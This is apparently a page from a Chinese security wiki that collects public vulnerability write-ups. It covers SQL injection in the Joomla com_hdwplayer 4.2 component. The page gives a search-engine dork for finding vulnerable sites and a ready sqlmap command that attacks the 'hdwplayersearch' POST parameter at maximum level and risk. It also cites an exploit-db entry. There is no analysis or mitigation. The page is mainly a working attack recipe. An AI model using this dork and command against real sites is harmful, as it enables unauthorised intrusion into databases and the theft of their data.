menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Joomla chevron_right Joomla! com_hdwplayer 4.2 - 'search.php' sql注入.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Joomla! com_hdwplayer 4.2 - 'search.php' sql注入.md
    549 B / 2021-04-21 09:23:46
        Joomla com\_hdwplayer 4.2 - \'search.php\' sql注入
==================================================

一、漏洞简介
------------

关键字:inurl:\"index.php?option=com\_hdwplayer\"

二、漏洞影响
------------

com\_hdwplayer 4.2

三、复现过程
------------

    python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch

参考链接
--------

> https://www.exploit-db.com/exploits/48242
    links
    file_download